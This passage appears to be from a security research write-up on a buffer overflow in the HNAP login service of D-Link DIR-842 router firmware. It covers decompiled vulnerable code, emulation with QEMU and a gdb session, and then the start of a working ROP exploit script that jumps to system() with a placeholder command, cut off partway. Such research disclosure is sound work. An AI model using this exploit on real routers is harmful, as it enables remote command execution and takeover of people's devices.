border-box;">destination_buffer</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">{</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">size_t</span> <span class="cm-variable" style="box-sizing: border-box;">length_param</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span><span class="cm-variable" style="box-sizing: border-box;">p</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span><span class="cm-variable" style="box-sizing: border-box;">pcVar1</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">var_overflow</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1024</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack2060</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1024</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> 
<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">EOT</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1028</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">sprintf</span>(<span class="cm-variable" style="box-sizing: border-box;">acStack2060</span>,<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"<%s>"</span>,<span class="cm-variable" style="box-sizing: border-box;">param_2</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">sprintf</span>(<span class="cm-variable" style="box-sizing: border-box;">EOT</span>,<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"</%s>"</span>,<span class="cm-variable" style="box-sizing: border-box;">param_2</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">length_param</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">strlen</span>(<span class="cm-variable" style="box-sizing: border-box;">acStack2060</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">p</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">strstr</span>(<span class="cm-variable" style="box-sizing: border-box;">controllable_input</span>,<span class="cm-variable" style="box-sizing: border-box;">acStack2060</span>);</span><br 
/><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">if</span> (<span class="cm-variable" style="box-sizing: border-box;">p</span> <span class="cm-operator" style="box-sizing: border-box;">!=</span> (<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span>)<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x0</span>) {</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">p</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">p</span> <span class="cm-operator" style="box-sizing: border-box;">+</span> <span class="cm-variable" style="box-sizing: border-box;">length_param</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">pcVar1</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">strstr</span>(<span class="cm-variable" style="box-sizing: border-box;">p</span>,<span class="cm-variable" style="box-sizing: border-box;">EOT</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">if</span> ((<span class="cm-variable" style="box-sizing: border-box;">pcVar1</span> <span class="cm-operator" style="box-sizing: border-box;">!=</span> (<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span>)<span class="cm-number" style="box-sizing: border-box; color: 
#64ab8f;">0x0</span>) <span class="cm-operator" style="box-sizing: border-box;">&&</span> (<span class="cm-variable" style="box-sizing: border-box;">pcVar1</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-variable" style="box-sizing: border-box;">pcVar1</span> <span class="cm-operator" style="box-sizing: border-box;">+</span> <span class="cm-operator" style="box-sizing: border-box;">-</span>(<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">int</span>)<span class="cm-variable" style="box-sizing: border-box;">p</span>, <span class="cm-operator" style="box-sizing: border-box;">-</span><span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1</span> <span class="cm-operator" style="box-sizing: border-box;"><</span> (<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">int</span>)<span class="cm-variable" style="box-sizing: border-box;">pcVar1</span>)) {</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">strlcpy</span>(<span class="cm-variable" style="box-sizing: border-box;">var_overflow</span>,<span class="cm-variable" style="box-sizing: border-box;">p</span>,<span class="cm-variable" style="box-sizing: border-box;">pcVar1</span> <span class="cm-operator" style="box-sizing: border-box;">+</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">var_overflow</span>[(<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">int</span>)<span class="cm-variable" style="box-sizing: border-box;">pcVar1</span>] <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">'\0'</span>;</span><br 
/><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">strcpy</span>(<span class="cm-variable" style="box-sizing: border-box;">destination_buffer</span>,<span class="cm-variable" style="box-sizing: border-box;">var_overflow</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">return</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">}</span></span></pre><p cid="n69" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #b8bfc6; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; orphans: 4; overflow-wrap: break-word; position: relative; white-space: pre-wrap;"></p><span style="font-family: helvetica;">Here the user-controllable input present in the login parameter tags is copied in an insecure way:</span></div><div><ul style="text-align: left;"><li><span style="font-family: helvetica;">inside a local buffer (i.e. 
"var_overflow");</span></li><li><span style="font-family: helvetica;">into the 128 byte buffer defined inside the caller function through the "destination_buffer" pointer.</span></li></ul></div><div><span style="font-family: helvetica;"><br /></span><h4 style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; clear: both; line-height: 1.5rem; margin: 0px 0px 1.5rem; orphans: 4; overflow-wrap: break-word; padding: 0px; position: relative; text-align: left;"><span class="md-plain" md-inline="plain" style="background-color: white; box-sizing: border-box; font-family: helvetica; letter-spacing: -1px; white-space: pre-wrap;"><b>Firmware Emulation and Binary </b></span><span style="font-family: helvetica;"><span style="letter-spacing: -1px; white-space: pre-wrap;">Debugging</span></span></h4><span style="font-family: helvetica;">In order to try to exploit the issue we have tried to emulate the firmware. We then used <a href="https://github.com/attify/firmware-analysis-toolkit" target="_blank"><i>FAT</i></a> in order to achieve full system emulation:</span></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n73" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"># ./fat.py ../fwrs/DIR-842_C1_FW300b18.bin </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> __ _</span><br /><span role="presentation" style="box-sizing: 
border-box; padding-right: 0.1px;"> / _| | |</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> | |_ __ _ | |_</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> | _| / _` | | __|</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> | | | (_| | | |_</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> |_| \__,_| \__|</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> Welcome to the Firmware Analysis Toolkit - v0.3</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> Offensive IoT Exploitation Training http://bit.do/offensiveiotexploitation</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> By Attify - https://attify.com | @attifyme</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] Firmware: DIR-842_C1_FW300b18.bin</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] Extracting the firmware...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] Image ID: 1</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] Identifying architecture...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] Architecture: mipseb</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] Building QEMU disk image...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] 
Setting up the network connection, please standby...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] Network interfaces: [('br0', '192.168.0.1'), ('br1', '192.168.7.1')]</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] All set! Press ENTER to run the firmware...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[+] When running, press Ctrl + A X to terminate qemu</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Creating TAP device tap1_0...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Set 'tap1_0' persistent and owned by uid 0</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Initializing VLAN...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Bringing up TAP device...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">attify123</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Adding route to 192.168.0.1...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Starting firmware emulation... 
use Ctrl-a + x to exit</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 0.000000] Linux version 2.6.32.70 (vagrant@vagrant-ubuntu-trusty-64) (gcc version 5.3.0 (GCC) ) #1 Thu Feb 18 01:39:21 UTC 2016</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 0.000000] </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 0.000000] LINUX started...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 0.000000] bootconsole [early0] enabled</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 0.000000] CPU revision is: 00019300 (MIPS 24Kc)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 0.000000] FPU revision is: 00739300</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 0.000000] Determined physical RAM map:</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></span></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-1jT-WOTJDLE/YF3_i8DQ_QI/AAAAAAAAAAM/TZ6SwtBI5eA3O4TTcKRdfhw8eNN-EgIIQCLcBGAsYHQ/s1638/dlink.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: helvetica;"><img border="0" data-original-height="626" data-original-width="1638" height="248" src="https://1.bp.blogspot.com/-1jT-WOTJDLE/YF3_i8DQ_QI/AAAAAAAAAAM/TZ6SwtBI5eA3O4TTcKRdfhw8eNN-EgIIQCLcBGAsYHQ/w652-h248/dlink.png" width="652" /></span></a></div><span style="font-family: helvetica;"><br /></span><p cid="n74" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #b8bfc6; font-size: 16px; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; orphans: 4; overflow-wrap: break-word; position: relative; 
white-space: pre-wrap;"><span style="font-family: helvetica;"><br /></span></p><span style="font-family: helvetica;"><br />To debug the issue and build a working exploit, however, we used the <a href="https://qemu-project.gitlab.io/qemu/user/main.html" target="_blank"><i>QEMU</i></a> user-mode emulation feature.</span></div><div><span style="font-family: helvetica;"><br />In particular, the following command was used to emulate an HTTP request to the target <i>mips</i> "hnap" service:</span></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n76" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="bash" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; font-family: helvetica; padding-right: 0.1px;"><span class="cm-builtin" style="box-sizing: border-box; color: #f3b3f8;">sudo</span> <span class="cm-builtin" style="box-sizing: border-box; color: #f3b3f8;">chroot</span> . 
./qemu-mips-static <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-E</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">HTTP_SOAPACTION</span><span class="cm-operator" style="box-sizing: border-box;">=</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"http://purenetworks.com/HNAP1/Login"</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-E</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">HTTP_HNAP_AUTH</span><span class="cm-operator" style="box-sizing: border-box;">=</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"69201619B75DDDFF967E6ADD87BA945F 1583432673"</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-E</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">REQUEST_URI</span><span class="cm-operator" style="box-sizing: border-box;">=</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"/HNAP1/"</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-E</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">REQUET_METHOD</span><span class="cm-operator" style="box-sizing: border-box;">=</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"POST"</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-E</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">HTTP_COOKIE</span><span class="cm-operator" style="box-sizing: border-box;">=</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"uid=99TIA1AP7"</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-E</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">CONTENT_LENGTH</span><span class="cm-operator" style="box-sizing: border-box;">=</span><span class="cm-number" 
style="box-sizing: border-box; color: #64ab8f;">2640</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-E</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">CONTENT_TYPE</span><span class="cm-operator" style="box-sizing: border-box;">=</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"text/xml; charset=utf-8"</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-g</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">4444</span> ./htdocs/HNAP1/hnap</span></pre><span style="font-family: helvetica;">The parameters used are described below:<br /><ul style="text-align: left;"><li><span style="font-family: helvetica;"><i>chroot</i>: the full command was executed within the root directory of the extracted <i>squash-fs</i> filesystem, so <i>chroot .</i> makes this directory the root directory;</span></li><li><span style="font-family: helvetica;"><i>qemu-mips-static</i>: allows emulating MIPS binaries. The "-E" option was used to set the environment variables required by "hnap" to invoke the vulnerable method as it normally would; "-g" sets the "QEMU_GDB" environment variable, which opens a <i>gdb-server</i> on the specified port (in this case port 4444).</span></li></ul></span></div><div><span style="font-family: helvetica;"><br />It was then possible to attach to the <i>gdb-server</i> running on "localhost:4444" and debug the target binary using <i>gdb-multiarch</i> as follows:</span></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n83" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="bash" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">$ gdb</span><span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-multiarch</span> </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">GNU gdb (Ubuntu <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">8</span>.1-0ubuntu3.2) <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">8</span>.1.0.20180409-git</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Copyright (C) <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">2018</span> Free Software Foundation, Inc.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">License GPLv3<span class="cm-operator" style="box-sizing: border-box;">+</span>: GNU GPL version <span class="cm-number" style="box-sizing: border-box; color: 
#64ab8f;">3</span> or later <http://gnu.org/licenses/gpl.html></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">This is free software: you are free to change and redistribute it.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">There is NO WARRANTY, to the extent permitted by law. Type <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"show copying"</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">and <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"show warranty"</span> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">for</span> details.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">This GDB was configured as <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"x86_64-linux-gnu"</span>.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Type <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"show configuration"</span> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">for</span> configuration details.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">For bug reporting instructions, please see:</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><http://www.gnu.org/software/gdb/bugs/>.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Find the GDB manual and other documentation resources online at:</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><http://www.gnu.org/software/gdb/documentation/>.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">For help, type <span class="cm-string" style="box-sizing: 
border-box; color: #d26b6b;">"help"</span>.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Type <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"apropos word"</span> to search <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">for</span> commands related to <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"word"</span>.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">(gdb) file htdocs/HNAP1/hnap </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Reading symbols from htdocs/HNAP1/hnap...(no debugging symbols found)...done.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">(gdb) target remote <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">127</span>.0.0.1:4444</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Remote debugging using <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">127</span>.0.0.1:4444</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">warning: remote target does not support file transfer, attempting to access files from local filesystem.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Reading symbols from ~/firmware/fwrs/_DIR-842_C1_FW300b18.bin.extracted/squashfs-root/lib/ld-uClibc-0.9.33.2.so...(no debugging symbols found)...done.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">0x7f7e7f90 <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">in</span> _start () from ~/firmware/fwrs/_DIR-842_C1_FW300b18.bin.extracted/squashfs-root/lib/ld-uClibc-0.9.33.2.so</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">(gdb) c</span><br /><span 
role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Continuing.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></span></pre><h4 style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; clear: both; font-size: 1.17rem; letter-spacing: -1px; line-height: 1.5rem; margin: 0px 0px 1.5rem; orphans: 4; overflow-wrap: break-word; padding: 0px; position: relative; text-align: left; white-space: pre-wrap;"><b><span style="font-family: helvetica; font-size: small;">A working Buffer Overflow exploit</span></b></h4><span style="font-family: helvetica;">After some further analysis in both user-mode and system-mode, we obtained a working ROP exploit that allowed us to execute an arbitrary command by jumping to the <i>ld-uClibc-0.9.33.2</i> <i>system()</i> function:</span></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n86" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="python" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">from</span> <span class="cm-variable" style="box-sizing: 
border-box;">pwn</span> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">import</span> <span class="cm-operator" style="box-sizing: border-box;">*</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">def</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">p32_big</span>(<span class="cm-variable" style="box-sizing: border-box;">data</span>):</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">return</span> <span class="cm-variable" style="box-sizing: border-box;">p32</span>(<span class="cm-variable" style="box-sizing: border-box;">data</span>, <span class="cm-variable" style="box-sizing: border-box;">endian</span> = <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">'big'</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">libc_text_base</span> = <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x2aae4000</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">libc_text_start</span> = <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x0</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">libc_system</span> = <span 
class="cm-variable" style="box-sizing: border-box;">libc_text_base</span> <span class="cm-operator" style="box-sizing: border-box;">+</span> (<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x00062104</span> <span class="cm-operator" style="box-sizing: border-box;">-</span> <span class="cm-variable" style="box-sizing: border-box;">libc_text_start</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">gadget1</span> = <span class="cm-variable" style="box-sizing: border-box;">libc_text_base</span> <span class="cm-operator" style="box-sizing: border-box;">+</span> (<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0x00042e08</span> <span class="cm-operator" style="box-sizing: border-box;">-</span> <span class="cm-variable" style="box-sizing: border-box;">libc_text_start</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-comment" style="box-sizing: border-box; color: #da924a;"># identified gadget</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-comment" style="box-sizing: border-box; color: #da924a;"># 0x00042e08 : sw $v0, 0xa8($sp) ; addiu $a0, $sp, 0xb8 ; lw $t9, 0x24($sp) ; jalr $t9 ; move $a1, $s6</span></span><br /><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">payload</span> = <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"A"</span> <span class="cm-operator" style="box-sizing: border-box;">*</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1028</span> <span class="cm-operator" style="box-sizing: border-box;">+</span> <span class="cm-variable" style="box-sizing: border-box;">p32_big</span>(<span class="cm-variable" style="box-sizing: 
border-box;">gadget1</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">payload</span> += <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"BBBB"</span> <span class="cm-comment" style="box-sizing: border-box; color: #da924a;"># $sp points here</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">payload</span> += <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"C"</span> <span class="cm-operator" style="box-sizing: border-box;">*</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">32</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">payload</span> += <span class="cm-variable" style="box-sizing: border-box;">p32_big</span>(<span class="cm-variable" style="box-sizing: border-box;">libc_system</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">payload</span> += <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"C"</span> <span class="cm-operator" style="box-sizing: border-box;">*</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">144</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">payload</span> += <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"touch /tmp/minded;"</span> <span class="cm-comment" style="box-sizing: border-box; color: #da924a;"># here the command to execute</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" 
